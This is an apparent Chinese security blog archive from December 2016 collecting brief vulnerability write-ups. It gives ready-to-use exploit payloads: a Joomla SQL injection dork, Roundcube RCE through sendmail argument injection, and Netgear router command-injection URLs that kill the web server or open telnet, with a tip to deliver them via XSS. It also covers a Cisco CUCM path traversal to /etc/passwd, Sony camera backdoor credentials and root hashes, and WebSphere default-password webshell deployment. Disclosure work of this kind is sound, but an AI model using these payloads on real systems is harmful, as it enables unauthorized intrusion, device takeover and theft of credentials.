博文

目前显示的是 十二月, 2016的博文

AD

Joomla_[com_blog_calendar]_SQL_Injection

keks:inurl:/index.php?option=com_blog_calendar

http://URL/[Path]/index.php?option=com_blog_calendar&modid=123

在参数modid出存在sql注入。


共享单车安全问题初探

今年下半年,共享单车发展迅速。探索一下关于共享单车的几个安全问题。   1、机械锁共享单车被免费使用:   共享单车直接投放在大街小巷。利用一些简单的手段即可免费使用。经过本人亲自测试,ofo共享单车为机械式锁,车身为了控制成本,没有安装GPS模块。市场上大部分为圆柱形机械锁,少部分按钮式机械锁。这两种锁,本人在无需任何工具的情况下,使用双手即可在1分钟内打开该机械锁。直接使用ofo单车。   2、蓝牙电子锁可以被免费使用(推测):  小鸣共享单车,车子安装有GPS,车子采用了蓝牙信号解锁的方式。经过本人观察,可以尝试重放蓝牙信号,达到绕开或者仿冒他人身份进行开锁使用的目的。因为在深圳呆的时间不长,并且没带专用设备,故没有实际测试。   3、个人行程隐私信息泄露  小鸣,小蓝(bluegogo)、摩拜等共享单车,多数APP内有骑行行程功能,如果其行程信息业务权限校验不严格,则可以导致攻击者可以通过技术手段获取到所有人都骑行行程信息。其次,如果这些行程信息明文上传及保存在共享单车提供者服务器上,则可能存在共享单车提供者侵犯用户隐私的安全隐患。

Jetty_HttpParser_Error_RemoteMemoryDisclosure_CVE-2015-2080

Jetty的HttpParser 模块存在一个漏洞,未能正确处理http请求的header头中的非法字符,当http请求的header中存在一个非法字符时,jetty的回应数据包会包含上一个请求数据在共享缓冲区中的内容。如果该缓冲区内有cookies等敏感信息,就可以被攻击者获取到。
  poc:
  header:\x00

McAfee_VirusScan_Enterprise_Linux_RCE

利用多个漏洞组合,在linux上的mcafee病毒扫描企业版的,可以实现以root权限的远程命令执行。 CVE-2016-8016: Remote Unauthenticated File Existence Test CVE-2016-8017: Remote Unauthenticated File Read (with Constraints) CVE-2016-8018: No Cross-Site Request Forgery Tokens CVE-2016-8019: Cross Site Scripting CVE-2016-8020: Authenticated Remote Code Execution & Privilege Escalation CVE-2016-8021: Web Interface Allows Arbitrary File Write to Known Location CVE-2016-8022: Remote Use of Authentication Tokens CVE-2016-8023: Brute Force Authentication Tokens CVE-2016-8024: HTTP Response Splitting CVE-2016-8025: Authenticated SQL Injection
POC: https://github.com/i1ikey0u/pub1ic_POC/blob/master/McAfee_VirusScan_Enterprise_Linux_RCE.py
来自:
https://packetstormsecurity.com/files/140147/McAfee-Virus-Scan-Enterprise-For-Linux-Remote-Code-Execution.html

Samsung_KNOX_OTP_可信域栈溢出

KNOX,是三星的一款基于开源Android平台的安全解决方案,可以认为是一个安全桌面应用,用户通过打开应用,输入口令即可访问安全桌面内的应用。安全桌面内只能安装经过三星安全认证后的应用。
三星手机上的KNOX有一个扩展功能,提供了一个可信域/trustzone,允许生成OPT令牌,令牌本身在可信域中的应用生成,结合TEE(UID:fffffffff0000000000000000000001e)。可以利用OTP访问进行通信。 由trustlet支持的许多命令必须解包或者打包一个令牌,通过调用函数“otp_unwrap”和“otp_wrap”来实现。这两个函数在尝试打包或者解包一个令牌时,会将内部OTP令牌数据复制到基于本地堆栈的缓冲区。但是,使用了用户缓冲区中提供的缓冲区大小数据来执行,该缓冲区大小/长度的指定根据调用代码的路径而改变。并且缓冲区的大小不会进行验证。攻击者可以利用该BUG,提交比堆栈缓冲区更大/更长的字节,导致用户控制的OTP令牌数据溢出。在三星SM-G925V设备上的MobiCore trustlet中没有堆栈cookie,任何用户都可以访问到OTP服务,包括在系统中的“untrusted_app”。利用这两点,用户可以将权限提升至TrustZone TEE。 研究人员已经开发了一个小脚本,可以利用OTP_GENERATE_OTP命令生成超过缓冲区大小的数据,从而导致OTP trustlet崩溃。
POC: https://github.com/i1ikey0u/pub1ic_POC/blob/master/Samsung_KNOX_OTP_POC.txt
附录: Trusted Execution Environment (TEE) 的解决方案,命名为“ARM TrustZone” ARM

Roundcube1.2.2_RCE

利用前提:
Roundcube 使用 PHP 的 mail 来发送邮件,而不通过其他 SMTP Server
PHP 的 mail 使用 sendmail 来发送邮件(默认)
PHP 的 safe_mode 是关闭的(默认)
攻击者需要知道 Web 应用的绝对路径
攻击者可以登录到 Roundcube 并可以发送邮件

影响版本:
1.1.x < 1.1.7
1.2.x < 1.2.3

漏洞分析:
PHP的mail默认使用/usr/sbin/sendmail发送邮件(可在php.ini中设置),mail的第五个参数就是设置sendmail的额外参数。sendmail有一个-X参数,可以将邮件流量记录在指定文件中。

攻击的思路如下:
构造邮件内容为想要执行的代码
点击发送时抓包更改_from
sendmail将流量记录到 php 文件中

POC:
1、登录 Roundcube 并开始发送邮件,
2、点击发送后拦截数据包
3、将_from改成:example@example.com -OQueueDirectory=/tmp -X/path/rce.php,其中-X后的路径需根据具体服务器情况来设置,默认 Roundcube 根目录下temp/、logs/是可写的。然后将_subject改成我们想要执行的代码,这里是。请求有可能会超时,但是并不影响文件的写入。

NETGEAR_R7000及R6400 命令注入执行

Netgear R7000, 固件版本 1.0.7.2_1.1.93 以及更早期版本, R6400固件版本 1.0.1.6_1.0.4 以及更早期版本, 包含一个包含任意命令注入漏洞.

影响范围:
Netgear R7000路由器,固件版本为1.0.7.2_1.1.93(可能包括更早版本);
Netgear R6400路由器,固件版本为1.0.1.6_1.0.4(可能包括更早版本);
USCERT社区上报称,R8000,固件版本1.0.3.4_1.1.2也受影响;可能还有其他型号受到影响。


POC:
http:///cgi-bin/;COMMAND

http:///cgi-bin/;killall$IFS'httpd'
在执行这一步之后,除非重启,否则路由器的web管理将一直不可用,可以利用执行该命令,造成netgear的WEB管理不可用,缓解漏洞。

http://RouterIP/;telnetd$IFS-p$IFS'45'
将在45端口开启telnet服务


利用技巧:
可以通过短链接或者XSS,构造一个POC,内网用户访问后,即可在netgear网关执行命令。

Cisco_CUCM任意文件下载_(CVE-2013-5528)

cisco CUCM的管理接口存在任意文件下载,通过认证后,访问如下目录格式,即可访问设备的敏感文件。

http://justpentest.com/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd


影响范围:
 version of 7.x, 8.x or 9.x

已经修补: 9.1.2, 10.5.2 and 11.5.x.

sony_IPELA_ENGINE_IP_Cameras_backdoor

索尼的IPELA ENGINE网络摄像头被发现存在多个后门,可以导致攻击者获取到设备的root权限。


POC1:后门账户
   debug/popeyeConnection
    primana/primana

POC2:利用后门账号,开启TELNET/SSH
   开启TELNET: Gen5系列设备SNC-DH160 测试通过
    http://primana:primana@HOST/command/prima-factory.cgi?foo=bar&Telnet=zKw2hEr9
    http://primana:primana@HOST/command/prima-factory.cgi?foo=bar&Telnet=cPoq2fi4cFk

   备注:在Gen6系列中,存在SSH服务,可以被开启。请求内容有些不同,为"himitunokagi" 字符串 (日语中为secret key)

POC3: 设备内置root账户
    root:$1$$mhF8LHkOmSgbD88/WrM790:0:0:5thgen:/root:/bin/sh (Gen5 cameras)
    root:iMaxAEXStYyd6:0:0:root:/root:/bin/sh (Gen6 cameras)

测试环境:
    SNC-DH160 version V1.82.01 (snc-ch-dh-e-series-eb-em-zb-zm-1-82-01.zip).
    Gen6 cameras V2.7.0 (snc-g6-series-v2-7-0.zip)


索尼sony确认受影响的产品:
   SNC-CH115, SNC-CH120, SNC-CH160, SNC-CH220, SNC-CH260, SNC-DH120,
SNC-DH120T, SNC-DH160, SNC-DH220, SNC-DH220T, SNC-DH260, SNC-EB520,
SNC-EM520, SNC-EM521, SNC-ZB550, SNC-ZM550, SNC-ZM551

SNC-EP550, SNC-EP580, SNC-ER550, SNC-ER550C, SNC-ER580, SNC-ER585,
SNC-ER…

websphere渗透测试经验总结

本文为websphere渗透测试经验总结,主要讲述如何通过websphere获取websehll,以及如何破解websphere数据源配置文件的数据库密码加密字符串。发现目标在内网中,通过端口探测一般即可发现websphere应用,可以通过直接访问 url/ibm/console/logon.jsp页面打开其控制台。或者可以在开放未知服务的端口,批量探测是否存在/ibm/console/logon.jsp页面,也可以判断是否是websphere应用。 攻击点1-获取WEBSHELL很多内网websphere的控制台存在弱口令/默认口令,可以使用admin/admin以及webshpere/webshpere这种口令登录。通过该口令登录控制台后,可以部署war包,从而获取到WEBSHELL。 部署war包的顺序为在左侧菜单栏,选择“应用程序”-“新建应用程序”。然后在主页面选择“新建企业应用程序”,选择“本地文件系统”,上传本地WEBSHELL打包的war文件。然后按照该war应用,按照完毕后,回到管理页面左侧菜单栏,在“应用程序类型中”,选择刚安装的应用,选择启动。启动后即可访问webshell。
攻击点2-获取数据库权限在获取到webshell后,可以读取shadow